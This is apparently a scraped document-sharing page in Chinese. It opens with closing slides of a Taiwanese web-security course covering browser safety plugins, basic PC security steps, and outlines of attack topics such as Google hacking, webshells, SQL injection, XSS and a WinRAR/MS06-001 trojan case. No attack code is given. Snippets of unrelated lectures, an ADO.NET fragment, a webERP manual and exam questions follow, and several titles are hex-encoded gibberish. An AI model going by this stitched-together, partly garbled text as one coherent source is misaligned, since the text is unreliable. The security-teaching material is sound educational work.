43 公告被植入惡意程式的網站 Zone-h 台灣地區被駭 大砲開講 網站安全 天罣 -- 淪陷網站 資安之眼 -- TW 網站淪陷資料庫 網頁瀏覽安全防護軟體 功能 : 透過在個人端安裝瀏覽器外掛 (for IE & Firefox) 元件針對網頁上的內容, 提供你瀏覽網頁時的安全性建議 ( 諸如網頁釣魚 廣告程式 間諜軟體 垃圾郵件等 ), 並且以顏色區分嚴重性 ( 綠 黃 灰 紅 ); 此外當使用大型搜尋引擎 (Google Yahoo MSN) 時, 會直接在搜尋結果上以色塊來表示該網頁的安全性, 以達到防護的效果 43

44 TrendProtect 瀏覽器外掛程式 官方下載處 : US/free_security_tools/trendprotect.php?page= download 警告燈號 : 良好 不佳 未知 McAfee SiteAdvisor 瀏覽器外掛程式 官方下載處 : 警告燈號 : 良好 不佳 未知 44

45 二者比較 McAfee SiteAdvisor TrendProtect 支援瀏覽器 IE,Firefox IE,Firefox 介面語言中文英文 警告燈號 有 有 警示與阻擋 有警示無阻擋 有警示無阻擋 網頁內容過濾 有 支援線上掃毒 危險網站詳細資料 使用者可加入評比網站安全性 有 有 有 常用工具 : 檔案偵測 ( 免費 ) Microsoft TechNet Windows Sysinternals p// / / / ysinternals/default.mspx Process Explorer for Windows v ysinternals/security/processexplorer.mspx AutoRuns for Windows v ysinternals/security/autoruns.mspx 45

46 電腦安全性的七大步驟 1. 評估使用電腦的風險, 隨時提高警覺不要亂點選 2. 使用防毒軟體及防間諜軟體, 並搭配線上掃毒 3. 保持更新作業系統及應用程式等軟體為最新狀態 4. 檢查您的作業系統及 IE 安全性設定 5. 使用個人 ( 單機 ) 防火牆 6. 建立穩固的密碼 7. 執行日常工作安全性維護, 例如 : 更新 掃毒 結論 利用知名搜尋引擎尋找目標 Web Server 搜尋引擎的風險 網站攻擊者思考 基本 進階 其它語法與關鍵字 搜尋存在漏洞的網站 查找別人留下來的 Webshell 後門 自動化 Google Hacks 工具 如何防止 Google Hacks Web Server 入侵手法 Microsoft 漏洞利用 網頁木馬 ( 原生型 漏洞型 asp 或 php 網頁木馬 ) 論壇套件漏洞利用 (Cookie 欺騙 論壇 DB 爆庫 %5c 路徑爆庫 其它套件路徑暴露 ) 論壇套件漏洞利用 (Cookie 欺騙論壇 DB 爆庫 %5c 路徑爆庫其它套件路徑暴露 ) SQL Injection 利用 XSS 利用 Web Server 防禦策略 網頁木馬流程阻擋點 46

47 問題與討論 網路攻防戰部落格 BCCS 47

<4D F736F F F696E74202D A67EABD7A7F0A8BEA4E2AA6BBEE3B27AB1B4B0515FC1BFB8712E BACDBAE65BCD2A6A15D>

<4D F736F F F696E74202D A67EABD7A7F0A8BEA4E2AA6BBEE3B27AB1B4B0515FC1BFB8712E BACDBAE65BCD2A6A15D> 2008 年度年度攻防手法整理探討 案例 : 利用 WINRAR 壓縮程式漏洞掛馬 1 入侵環境條件 : 具有 MS06-001 wmf 漏洞的電腦 安裝 WINRAR 壓縮 / 解壓縮軟體 手法探討 : 製造遠端遙控型木馬 ( 原生型木馬 ) 製造 MS06-001 漏洞工具 撰寫呼叫 wmf 檔案的掛馬網址 使用 WINRAR 製做具有 XSS 的自動解壓縮檔案 被害人點選自動解壓縮檔案後植入

More information

Microsoft PowerPoint - Web入侵+手機安全_講義.ppt [相容模式]

Microsoft PowerPoint - Web入侵+手機安全_講義.ppt [相容模式] 網路攻防戰之 Web 2.0 網站手法 與防範 大綱 Web Server 入侵手法 常見的漏洞利用介紹 網頁木馬簡介 論壇套件漏洞介紹 SQL Injection & XSS 手法介紹 Web Server 防禦策略 駭客攻擊 Web 之阻擋方式 惡意連結網站清單 建置社群 web2.0 網站之注意事項 Web Server 入侵手法 Microsoft 漏洞利用 網頁木馬 論壇套件漏洞利用 SQL

More information

網路攻防戰 之 實務案例分析 個資防護

網路攻防戰  之   實務案例分析 個資防護 Hacking Web Servers 資訊工程系所授課講師 : 許振銘協同業師 : 呂守箴 補充資料 : OWASP 網站 : http://www.owasp.org OWASP Testing Guide v3 英文版下載處 http://www.owasp.org/images/5/56/owasp_testing_g uide_v3.pdf 簡體中文版下載處 http://www.owasp.org/images/0/06/

More information

無投影片標題

無投影片標題 網路入侵攻擊實錄 中小馬 被掛馬 潘朵拉 no-name 大綱 瀏覽網站中小馬 --- 使用者 網站被掛馬畫面 ( 未公布資訊 ) 中木馬 - 天知地知就是我不知 看網站有那麼嚴重嗎?(Blog_Clickjacking& 影音網馬 ) 網站入侵掛馬實錄 --- 伺服器 網站洩露多少重要資訊! 使用開發套件網站安全嗎? 網站入侵實戰!( 入侵網站後台系統 ) 躲在後面的神密客 --- 駭客 Botnet

More information

<4D F736F F F696E74202D20B2C43033B3F55FA4ECB0A8A44AAB49A46AB4A6AFB5B2C43032B6B05FBAEBB5D8AAA95FC1BFB8712E BACDBAE65BCD2A

<4D F736F F F696E74202D20B2C43033B3F55FA4ECB0A8A44AAB49A46AB4A6AFB5B2C43032B6B05FBAEBB5D8AAA95FC1BFB8712E BACDBAE65BCD2A 網路攻防戰之木馬入侵大揭秘 II ( 精華版 ) 注意事項 部份簡報為節省版面, 請點選各張簡報標註之超連結自行參閱 本場次的 Demo 示範因場地之限 Demo 時無法再將字形及畫面放大, 想要抄筆記的同學請盡量往前坐 本場次示範之手法為避免煽惑他人犯罪, 部分破壞性資訊例如 : 關鍵參數 語法已做相關隱藏處理 本場次示範所使用之惡意軟體受限於相關法律規定請勿索取 1 大綱 攻擊第一招 : 木馬產生術

More information

投影片 1

投影片 1 資料庫管理程式 ( 補充教材 -Part2) 使用 ADO.NET 連結資料庫 ( 自行撰寫程式碼 以實現新增 刪除 修改等功能 ) Private Sub InsertButton_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles InsertButton.Click ' 宣告相關的 Connection

More information

<4D F736F F F696E74202D20B2C43033B3F55FADD3B8EAACAABA7CBB50BADDC249A8BEC540BAEBB5D8AAA95FC1BFB871A7F3B7732E BACDBAE65BCD

<4D F736F F F696E74202D20B2C43033B3F55FADD3B8EAACAABA7CBB50BADDC249A8BEC540BAEBB5D8AAA95FC1BFB871A7F3B7732E BACDBAE65BCD 網路攻防戰之個資洩漏與端點防護 ( 精華版 ) 大綱 使用者端的個資洩漏 從上網的風險 從電子郵件的風險 伺服器端的個資洩漏 檢視 Web Server 的安全 檢視 Web 應用程式 資料庫的安全 檢視搜尋引擎造成的風險 網路架構的端點防護 從弱點修補的觀點 從防毒防駭的觀點 從閘道端設備的觀點 從網路佈署的的觀點 1 使用者端的個資洩漏 從上網的風險從電子郵件的風險 從上網的風險 網路相簿 網路購物

More information

導讀 ASP.NET HTML ASP 第一篇 基礎篇第 1 章 認識 ASP.NET ASP.NET ASP.NET ASP.NET ASP.NET 第 2 章 認識 Visual Studio 20 開發環境 Visual Studio 20 Visual Studio 20 第二篇 C# 程式

導讀 ASP.NET HTML ASP 第一篇 基礎篇第 1 章 認識 ASP.NET ASP.NET ASP.NET ASP.NET ASP.NET 第 2 章 認識 Visual Studio 20 開發環境 Visual Studio 20 Visual Studio 20 第二篇 C# 程式 導讀 ASP.NET HTML ASP 第一篇 基礎篇第 1 章 認識 ASP.NET ASP.NET ASP.NET ASP.NET ASP.NET 第 2 章 認識 Visual Studio 20 開發環境 Visual Studio 20 Visual Studio 20 第二篇 C# 程式語言篇第 3 章 C# 程式語言基礎 C# C# 3.0 var 第 4 章 基本資料處理 C# x

More information

2016 勒索軟體白皮書

2016 勒索軟體白皮書 Botnet Botnet 1 1 2 2 5 5 6 9 10 11 11 11 12 12 12 12 12 12 13 14 2016 1989 AIDS AIDS C 189 2005 2006 TROJ_CRYPZIP.A 2011 TROJ_RANSOM.QOWA 12 2012 REVETON 2013 Cryptolocker Cryptolocker AES RSA Cryptolocker

More information

untitled

untitled 01 1-1 PHP 1-2 PHP 1-3 MySQL 1-4 1-5 http://w3techs.com/technologies/history_overview/programming_language w3techs.com (Server-side) 2012 7 77.8% PHP PHP PHP PHP 1-1 PHP PHP HTML Script Windows ASP(Active

More information

13 根 据 各 种 网 络 商 务 信 息 对 不 同 用 户 所 产 生 的 使 用 效 用, 网 络 商 务 信 息 大 致 可 分 为 四 级, 其 中 占 比 重 最 大 的 是 ( A ) A 第 一 级 免 费 信 息 B 第 二 级 低 收 费 信 息 C 第 三 级 标 准 收 费

13 根 据 各 种 网 络 商 务 信 息 对 不 同 用 户 所 产 生 的 使 用 效 用, 网 络 商 务 信 息 大 致 可 分 为 四 级, 其 中 占 比 重 最 大 的 是 ( A ) A 第 一 级 免 费 信 息 B 第 二 级 低 收 费 信 息 C 第 三 级 标 准 收 费 助 理 电 子 商 务 考 试 真 题 试 题 第 一 部 分 : 理 论 部 分 一 单 项 选 择 题 1 ( B ) 是 信 息 系 统 的 核 心 组 成 部 分 A 逻 辑 模 型 B 数 据 库 C 概 念 模 型 D 以 上 全 部 2 ping www.163.com -t 中 参 数 t 的 作 用 是 :( A ) A 进 行 连 续 测 试 B 在 新 窗 口 中 显 示 C

More information

第三篇 第 10 章 - 管理者登入第 11 章 - 更改網路商店 Logo 第 12 章 - 系統設定第 13 章 - 商品上架第 14 章 - 付款方式設定第 15 章 - 出貨方式設定第 16 章 - 特價商品 oscommerce 103

第三篇 第 10 章 - 管理者登入第 11 章 - 更改網路商店 Logo 第 12 章 - 系統設定第 13 章 - 商品上架第 14 章 - 付款方式設定第 15 章 - 出貨方式設定第 16 章 - 特價商品 oscommerce 103 第三篇 第 10 章 - 管理者登入第 11 章 - 更改網路商店 Logo 第 12 章 - 系統設定第 13 章 - 商品上架第 14 章 - 付款方式設定第 15 章 - 出貨方式設定第 16 章 - 特價商品 103 電子商務網站經營與管理 10-11 - Logo 12-13 - 14-15 - 16 - 一 情境描述 - 店主的心聲 1. 2. / 104 3. 第三篇網路商店新店開幕

More information

XXXXXXXX http://cdls.nstl.gov.cn 2 26

XXXXXXXX http://cdls.nstl.gov.cn 2 26 [ ] [ ] 2003-7-18 1 26 XXXXXXXX http://cdls.nstl.gov.cn 2 26 (2003-7-18) 1...5 1.1...5 1.2...5 1.3...5 2...6 2.1...6 2.2...6 2.3...6 3...7 3.1...7 3.1.1...7 3.1.2...7 3.1.2.1...7 3.1.2.1.1...8 3.1.2.1.2...10

More information

epub 61-2

epub 61-2 2 Web Dreamweaver UltraDev Dreamweaver 3 We b We b We Dreamweaver UltraDev We b Dreamweaver UltraDev We b We b 2.1 Web We b We b D r e a m w e a v e r J a v a S c r i p t We b We b 2.1.1 Web We b C C +

More information

一 個 SQL Injection 實 例 的 啟 示 頁 2 / 6 因 此, 在 知 名 網 站 上 看 到 SQL Injection, 讓 人 驚 心, 卻 不 意 外 網 站 專 案 外 包 是 目 前 業 界 的 常 態, 而 在 價 格 取 勝 的 制 度 下, 低 價 得 標 的 S

一 個 SQL Injection 實 例 的 啟 示 頁 2 / 6 因 此, 在 知 名 網 站 上 看 到 SQL Injection, 讓 人 驚 心, 卻 不 意 外 網 站 專 案 外 包 是 目 前 業 界 的 常 態, 而 在 價 格 取 勝 的 制 度 下, 低 價 得 標 的 S 一 個 SQL Injection 實 例 的 啟 示 頁 1 / 6 你 的 網 站 在 裸 奔 嗎? 一 個 SQL Injection 實 例 的 啟 示 作 者 : 李 明 儒 SQL Injection( 資 料 隱 碼 攻 擊 ) 問 題 早 就 不 是 什 麼 新 聞, 但 前 陣 子 在 一 個 頗 具 知 名 度 的 活 動 網 站 上, 赫 然 發 現 它 大 刺 刺 地 現 身!

More information

目 錄 第 一 章 weberp 簡 介... 6 第 一 節 概 述... 6 第 二 節 安 全 性... 7 第 三 節 功 能... 7 一 銷 售 及 訂 單... 7 二 稅... 8 三 應 收 帳 款... 8 四 存 貨... 8 五 購 買... 9 六 應 付 帳 款... 9

目 錄 第 一 章 weberp 簡 介... 6 第 一 節 概 述... 6 第 二 節 安 全 性... 7 第 三 節 功 能... 7 一 銷 售 及 訂 單... 7 二 稅... 8 三 應 收 帳 款... 8 四 存 貨... 8 五 購 買... 9 六 應 付 帳 款... 9 東 吳 大 學 企 研 所 資 訊 管 理 期 末 報 告 weberp 使 用 說 明 書 指 導 教 授 : 尚 榮 安 教 授 第 一 組 童 偉 哲 01353025 劉 彥 澧 01353028 史 璦 禎 01353031 吳 采 紋 98153143 1 目 錄 第 一 章 weberp 簡 介... 6 第 一 節 概 述... 6 第 二 節 安 全 性... 7 第 三 節 功

More information

06 C H A P T E R 6-1 WWW 6-2 WWW WWW WWW

06 C H A P T E R 6-1 WWW 6-2 WWW WWW WWW 06 C H A P T E R 6-1 WWW 6-2 WWW 6-3 6-4 WWW 6-5 6-6 WWW WWW World Wide Web Tim Berners-Lee hypertext HTTP HTML URL 6-1 WWW WWW World Wide Web Web BBS Telnet Gopher FTP UseNet W3 3W W3 3W WWW WWW WWW Hypertext

More information

FileMaker 15 WebDirect 指南

FileMaker 15 WebDirect 指南 FileMaker 15 WebDirect 2013-2016 FileMaker, Inc. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc. FileMaker WebDirect FileMaker, Inc. FileMaker

More information

Microsoft Word - A201101-1519.doc

Microsoft Word - A201101-1519.doc 5 10 15 20 25 30 基 于 ASP+ACCESS 的 辽 宁 工 程 技 术 大 学 考 试 网 的 设 计 与 开 发 董 强 1, 宋 喜 义 2 2**, 黄 培 泉 (1. 辽 宁 工 程 技 术 大 学 安 全 科 学 与 工 程 学 院, 辽 宁 阜 新 123000; 2. 辽 宁 工 程 技 术 大 学 实 验 实 训 中 心, 辽 宁 阜 新 123000) 摘 要

More information

1. ( B ) IT (A) (B) (C) (D) 2. ( A ) (A) (B) (C) (D) 3. ( B ) (A) GPS (B) GIS (C) ETC (D) CAI 4. ( D ) (A) (B) (C) (D) 5. ( B ) (Stored Program) (A) H

1. ( B ) IT (A) (B) (C) (D) 2. ( A ) (A) (B) (C) (D) 3. ( B ) (A) GPS (B) GIS (C) ETC (D) CAI 4. ( D ) (A) (B) (C) (D) 5. ( B ) (Stored Program) (A) H ... 2... 4... 6... 8... 10... 12... 14... 16... 18... 20... 22... 24... 25... 26... 28 1. ( B ) IT (A) (B) (C) (D) 2. ( A ) (A) (B) (C) (D) 3. ( B ) (A) GPS (B) GIS (C) ETC (D) CAI 4. ( D ) (A) (B) (C)

More information

iziggi

iziggi iziggi 1 1 iziggi-hd 2 iziggi-hd 4 IPEVO iziggi-hd 6 iziggi-hd 8 iziggi-hd 9 Whiteboard App USB 10 iziggi-hd 11 iziggi-hd Live View WiFi 11 12 LED 12 iziggi-hd 13 Apple TV AirPlay 13 14 15 iziggi-hd *

More information

09 F9 128 peer to peer, P2P file transfer protocol bittorrent 10 P2P P2P GNU/ Linux P2P CC 單機版的智慧財產權 vs. 人權戰爭 1980 DVD content

09 F9 128 peer to peer, P2P file transfer protocol bittorrent 10 P2P P2P GNU/ Linux P2P CC 單機版的智慧財產權 vs. 人權戰爭 1980 DVD content 當智慧財產 侵犯人權? 智慧財產與人權 Kickstarter The Matrix The Matrix Avatar Eywa 12 2013 4 484 09 F9 128 peer to peer, P2P file transfer protocol bittorrent 10 P2P P2P GNU/ Linux P2P CC 單機版的智慧財產權 vs. 人權戰爭 1980 DVD content

More information

使用手冊

使用手冊 使用手冊 版權所有 2013 年 Microtek International, Inc. 保留所有權利 商標 Microtek MII MiiNDT ScanWizard Microtek International, Inc. Windows Microsoft Corporation 重要須知 Microtek Microtek Windows Microsoft Windows I49-004528

More information

ASP 電子商務網頁設計

ASP 電子商務網頁設計 Flash Flash CSIE, NTU December 22, 2007 Outline & Flash National Taiwan University December 22, 2007 Page 2 Outline & Flash National Taiwan University December 22, 2007 Page 3 Course Introduction (1/3)

More information

輕鬆學 Dreamweaver CS5 網頁設計..\Example\Ch0\ \.html..\example\ch0\ \mouse.txt..\example\ch0\ \ _Ok.html 學習重點 JavaScript 複製程式碼 mouse.txt Ctrl+C Ctrl+C 0-4

輕鬆學 Dreamweaver CS5 網頁設計..\Example\Ch0\ \.html..\example\ch0\ \mouse.txt..\example\ch0\ \ _Ok.html 學習重點 JavaScript 複製程式碼 mouse.txt Ctrl+C Ctrl+C 0-4 JAVA Extension 0..\Example\Ch0\ \ T.html..\Example\Ch0\ \ T.txt T.txt..\Example\Ch0\ \ T_Ok.html 提示 :. Marquee Marquee Font Color #FFFFFF BG Color #867bf Width 90 Height 50. T.txt Ctrl+C your scrolling

More information

Chapter 2

Chapter 2 2 (Setup) ETAP PowerStation ETAP ETAP PowerStation PowerStation PowerPlot ODBC SQL Server Oracle SQL Server Oracle Windows SQL Server Oracle PowerStation PowerStation PowerStation PowerStation ETAP PowerStation

More information

目录

目录 目 录 1 系 统 概 述... 1 1.1 主 要 功 能... 1 1.2 工 作 环 境 要 求... 2 1.2.1 硬 件 环 境... 2 1.2.2 操 作 系 统... 2 1.2.3 数 据 库... 2 1.2.4 浏 览 器... 2 2 安 装 卸 载... 3 2.1 安 装 步 骤... 3 2.2 使 用 加 密 狗... 5 2.3 卸 载 步 骤... 6 3 新

More information

Microsoft Word - WebGoat用户指南-beta2.doc

Microsoft Word - WebGoat用户指南-beta2.doc 目 录 序 言 :WebGoat 中 文 概 述... 3 目 标... 3 概 要... 3 未 来 发 展... 3 下 载... 4 发 行 版... 4 WebGoat 5.2 标 准 版... 4 WebGoat 5.2 开 发 版 ( 位 于 Sourceforge)... 4 演 示 解 决 方 案... 4 演 示 视 频 链 接... 5 项 目 贡 献 者... 5 1. Webgoat

More information

Contents 1. IPSIDS...1... 19 2....2 IT... 21 3....2 4....3 FAQ... 26 5. 21 CISP...3 6. IPS...3 7. 2008...4 8. 2008...4...6...7 IPS Web...9...13...14...15 TOP10...16... 28... 31... 33... 37... 40... 42...

More information

投影片 1

投影片 1 惡意網站與網頁掛馬 實作課程 Taiwan Honeynet Project 資安分析師鄭毓芹 網站探測 (Capture-HPC) 網路封包 (Wireshark) 網站探測結果 探測紀錄資訊 惡意程式樣本 (Wireshark) 瀏覽路徑分析 掛馬檔案擷取 惡意程式行為分析 防毒軟體偵測 cwsandbox virustotal 掛馬分析 Rhino Javascript Interpreter

More information

Microsoft PowerPoint _木馬入侵_講義.ppt [相容模式]

Microsoft PowerPoint _木馬入侵_講義.ppt [相容模式] 網路攻防戰 之 木馬入侵大揭秘 講師 呂守箴 大綱 攻擊第一招 : 木馬產生術 為什麼會有木馬病毒? 類型一 : 原生型木馬 類型二 : 漏洞型木馬 類型三 : 網頁木馬 攻擊第二招 : 避過防毒軟體的方式 木馬與病毒的偽裝術 攻擊第三招 : 木馬傳送的手法與利用的管道 郵件社交工程的病毒傳輸方式 隨身裝置 : 智慧型手機與平板電腦的病毒 防禦大絕招 : 防制手段 常見防毒與防間諜軟體的應用 攻擊第一招

More information

<4D6963726F736F667420576F7264202D20383439342D352DBED6D3F2CDF8D7E9BDA8D3EBB9DCC0EDCFEEC4BFBDCCB3CCD5FDCEC42E646F63>

<4D6963726F736F667420576F7264202D20383439342D352DBED6D3F2CDF8D7E9BDA8D3EBB9DCC0EDCFEEC4BFBDCCB3CCD5FDCEC42E646F63> 第 4 单 元 搭 建 自 己 的 Web 站 点 本 单 元 通 过 学 习 架 构 Web 服 务 器, 实 现 Web 服 务, 管 理 Web 站 点, 了 解 Web 站 点 服 务 器 的 架 构 个 人 空 间 和 虚 拟 主 机 的 概 念, 掌 握 IIS 组 件 的 安 装 Web 站 点 的 创 建 管 理 站 点 属 性 选 项 卡 的 配 置 管 理 等 知 识,Web 网

More information

01 用 ActionScript 3.0 開始認識 Flash CS3 Flash 是應用在網路上非常流行且高互動性的多媒體技術, 由於擁有向量圖像體積小的優點, 而且 Flash Player 也很小巧精緻, 很快的有趣的 Flash 動畫透過設計師的創意紅遍了整個網際網路 雖然很多人都對 Fl

01 用 ActionScript 3.0 開始認識 Flash CS3 Flash 是應用在網路上非常流行且高互動性的多媒體技術, 由於擁有向量圖像體積小的優點, 而且 Flash Player 也很小巧精緻, 很快的有趣的 Flash 動畫透過設計師的創意紅遍了整個網際網路 雖然很多人都對 Fl 01 用 ActionScript 3.0 開始認識 Flash CS3 Flash 是應用在網路上非常流行且高互動性的多媒體技術, 由於擁有向量圖像體積小的優點, 而且 Flash Player 也很小巧精緻, 很快的有趣的 Flash 動畫透過設計師的創意紅遍了整個網際網路 雖然很多人都對 Flash 可以做精美的網路動畫並不陌生, 但是實際上 Flash 不僅如此, 只要搭配 ActionScript

More information

1 IT IT IT IT Virtual Machine, VM VM VM VM Operating Systems, OS IT

1 IT IT IT IT Virtual Machine, VM VM VM VM Operating Systems, OS IT 1 IT IT IT IT Virtual Machine, VM VM VM VM Operating Systems, OS IT Chapter 1 了解虛擬化技術種類 硬體 / 平台 / 伺服器虛擬化 VM VM VM CPU Hypervisor VMM Virtual Machine Manager VM Host OS VM VM Guest OS Host OS CPU VM Hyper-V

More information

User Group SMTP

User Group SMTP SOP v1.00 2003 02 28 TrendMicro Control Manager V2.5 1 1... 3 2... 4 2.1... 4 2.2... 14 3... 24 3.1... 24 3.2... 29 3.3... 34 3.3.1... 34 3.3.2 User Group... 37 3.3.3... 40 3.4... 41 3.4.1... 41 3.4.2

More information

SyncMail AJAX Manual

SyncMail AJAX Manual HKBN Cloud Mail on Mobile How to setup POP3 and IMAP (Version 1.1) 1 Table of Contents HKBN Cloud Mail 用戶設定 Android 手冊 HKBN Cloud Mail Android Setup... 3 Android 2.X... 3 Android 3.x - 4.X... 6 HKBN Cloud

More information

0 0 = 1 0 = 0 1 = = 1 1 = 0 0 = 1

0 0 = 1 0 = 0 1 = = 1 1 = 0 0 = 1 0 0 = 1 0 = 0 1 = 0 1 1 = 1 1 = 0 0 = 1 : = {0, 1} : 3 (,, ) = + (,, ) = + + (, ) = + (,,, ) = ( + )( + ) + ( + )( + ) + = + = = + + = + = ( + ) + = + ( + ) () = () ( + ) = + + = ( + )( + ) + = = + 0

More information

(CIP) Web /,. :,2005. 1 ISBN 7 81058 782 X.W............T P393.4 CIP (2004) 118797 Web ( 99 200436) ( http:/ / www.shangdapress.com 66135110) : * 787

(CIP) Web /,. :,2005. 1 ISBN 7 81058 782 X.W............T P393.4 CIP (2004) 118797 Web ( 99 200436) ( http:/ / www.shangdapress.com 66135110) : * 787 Web (CIP) Web /,. :,2005. 1 ISBN 7 81058 782 X.W............T P393.4 CIP (2004) 118797 Web ( 99 200436) ( http:/ / www.shangdapress.com 66135110) : * 787 1092 1/ 16 30.75 748 2005 1 1 2005 1 1 : 1 3 100

More information

關於本書 Part 3 CSS XHTML Ajax Part 4 HTML 5 API JavaScript HTML 5 API Canvas API ( ) Video/Audio API ( ) Drag and Drop API ( ) Geolocation API ( ) Part 5

關於本書 Part 3 CSS XHTML Ajax Part 4 HTML 5 API JavaScript HTML 5 API Canvas API ( ) Video/Audio API ( ) Drag and Drop API ( ) Geolocation API ( ) Part 5 網頁程式設計 HTML JavaScript CSS HTML JavaScript CSS HTML 5 JavaScript JavaScript HTML 5 API CSS CSS Part 1 HTML HTML 5 API HTML 5 Apple QuickTime Adobe Flash RealPlayer Ajax XMLHttpRequest HTML 4.01 HTML 5

More information

本 课 程 作 为 非 计 算 机 专 业 本 科 通 识 课 程, 是 一 门 理 论 和 实 践 紧 密 结 合 的 实 用 课 程, 内 容 包 括 计 算 机 基 础 部 分 和 程 序 设 计 部 分 计 算 机 基 础 部 分 涵 盖 计 算 机 软 硬 件 组 成 数 制 表 示 操

本 课 程 作 为 非 计 算 机 专 业 本 科 通 识 课 程, 是 一 门 理 论 和 实 践 紧 密 结 合 的 实 用 课 程, 内 容 包 括 计 算 机 基 础 部 分 和 程 序 设 计 部 分 计 算 机 基 础 部 分 涵 盖 计 算 机 软 硬 件 组 成 数 制 表 示 操 计 算 机 基 础 部 程 序 设 计 类 课 程 介 绍 1. Java 语 言 程 序 设 计 Java 简 介 Java 是 一 种 开 放 的 可 以 撰 写 跨 平 台 应 用 程 序 的 面 向 对 象 的 程 序 设 计 语 言 Java 技 术 具 有 卓 越 的 通 用 性 高 效 性 平 台 移 植 性 和 安 全 性, 广 泛 应 用 于 PC 数 据 中 心 科 学 超 级

More information

RUN_PC連載_8_.doc

RUN_PC連載_8_.doc PowerBuilder 8 (8) Web DataWindow ( ) DataWindow Web DataWindow Web DataWindow Web DataWindow PowerDynamo Web DataWindow / Web DataWindow Web DataWindow Wizard Web DataWindow Web DataWindow DataWindow

More information

hw4

hw4 System Administration HW4 - Web Server/Services yoychen, blzhuang Environment setup You can choose one of following options qplan A: FreeBSD Server with Public IP qplan B: 使用 VirtualBox 開兩台 FreeBSD server

More information

目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡 器...8 客 户 端 :Web 浏 览 器 和 移 动 应 用 程 序...8 客 户 端 :Tableau Desktop..

目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡 器...8 客 户 端 :Web 浏 览 器 和 移 动 应 用 程 序...8 客 户 端 :Tableau Desktop.. Neelesh Kamkolkar, 产 品 经 理 Ellie Fields, 产 品 营 销 副 总 裁 Marc Rueter, 战 略 解 决 方 案 高 级 总 监 适 用 于 企 业 的 Tableau: IT 概 述 目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡

More information

ASP.NET MVC Visual Studio MVC MVC 範例 1-1 建立第一個 MVC 專案 Visual Studio MVC step 01 Visual Studio Web ASP.NET Web (.NET Framework) step 02 C:\M

ASP.NET MVC Visual Studio MVC MVC 範例 1-1 建立第一個 MVC 專案 Visual Studio MVC step 01 Visual Studio Web ASP.NET Web (.NET Framework) step 02 C:\M ASP.NET MVC Visual Studio 2017 1 1-4 MVC MVC 範例 1-1 建立第一個 MVC 專案 Visual Studio MVC step 01 Visual Studio Web ASP.NET Web (.NET Framework) step 02 C:\MvcExamples firstmvc MVC 1-7 ASP.NET MVC 1-9 ASP.NET

More information

Trend Micro

Trend Micro 資 訊 安 全 - 惡 意 軟 體 的 深 度 防 禦 胡 瑞 宸 大 綱 資 訊 安 全 概 念 現 在 流 行 什 麼? 病 毒 清 除 與 分 析 建 議 程 序 正 確 有 效 的 防 護 觀 念 Free Tool ( 免 費 工 具 ) Cloud technology ( 雲 端 技 術 ) 惡 意 程 式 威 脅 管 理 資 訊 安 全 概 念 資 訊 安 全 概 念 沒 有 任 何

More information

<4D6963726F736F667420576F7264202D20C9CFBAA3CAD0BCC6CBE3BBFAB5C8BCB6BFBCCAD4C8FDBCB6BFBCCAD4B4F3B8D95FBDA8D2E9B8E55F5F303632352E646F63>

<4D6963726F736F667420576F7264202D20C9CFBAA3CAD0BCC6CBE3BBFAB5C8BCB6BFBCCAD4C8FDBCB6BFBCCAD4B4F3B8D95FBDA8D2E9B8E55F5F303632352E646F63> 上 海 市 高 等 学 校 计 算 机 等 级 考 试 ( 三 级 ) 考 试 大 纲 -- 建 议 稿 -- 2007-6-25 25 目 录 上 海 市 高 等 学 校 计 算 机 等 级 考 试 三 级 总 体 说 明 -----------------1 三 级 ( 计 算 机 系 统 与 网 络 技 术 ) 考 试 大 纲 ---------------------2 三 级 ( 管 理

More information

声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 任 何 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本 公 司 负 责 人 和 主 管 会 计 工

声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 任 何 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本 公 司 负 责 人 和 主 管 会 计 工 Shenzhen WitSoft Information Technology Co., Ltd. 主 办 券 商 二 〇 一 六 年 二 月 声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 任 何 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本

More information

p.2 1 <HTML> 2 3 <HEAD> 4 <TITLE> </TITLE> 5 </HEAD> 6 7 <BODY> 8 <H3><B> </B></H3> 9 <H4><I> </I></H4> 10 </BODY> </HTML> 1. HTML 1. 2.

p.2 1 <HTML> 2 3 <HEAD> 4 <TITLE> </TITLE> 5 </HEAD> 6 7 <BODY> 8 <H3><B> </B></H3> 9 <H4><I> </I></H4> 10 </BODY> </HTML> 1. HTML 1. 2. 2005-06 p.1 HTML HyperText Mark-up Language 1. HTML Logo, Pascal, C++, Java HTML 2. HTML (tag) 3. HTML 4. HTML 1. HTML 2. 3. FTP HTML HTML html 1. html html html cutehtmleasyhtml 2. wyswyg (What you see

More information

The golden pins of the PCI card can be oxidized after months or years

The golden pins of the PCI card can be oxidized after months or years Q. 如何在 LabWindows/CVI 編譯 DAQ Card 程式? A: 請參考至下列步驟 : 步驟 1: 安裝驅動程式 1. 安裝 UniDAQ 驅動程式 UniDAQ 驅動程式下載位置 : CD:\NAPDOS\PCI\UniDAQ\DLL\Driver\ ftp://ftp.icpdas.com/pub/cd/iocard/pci/napdos/pci/unidaq/dll/driver/

More information

SiteView技术白皮书

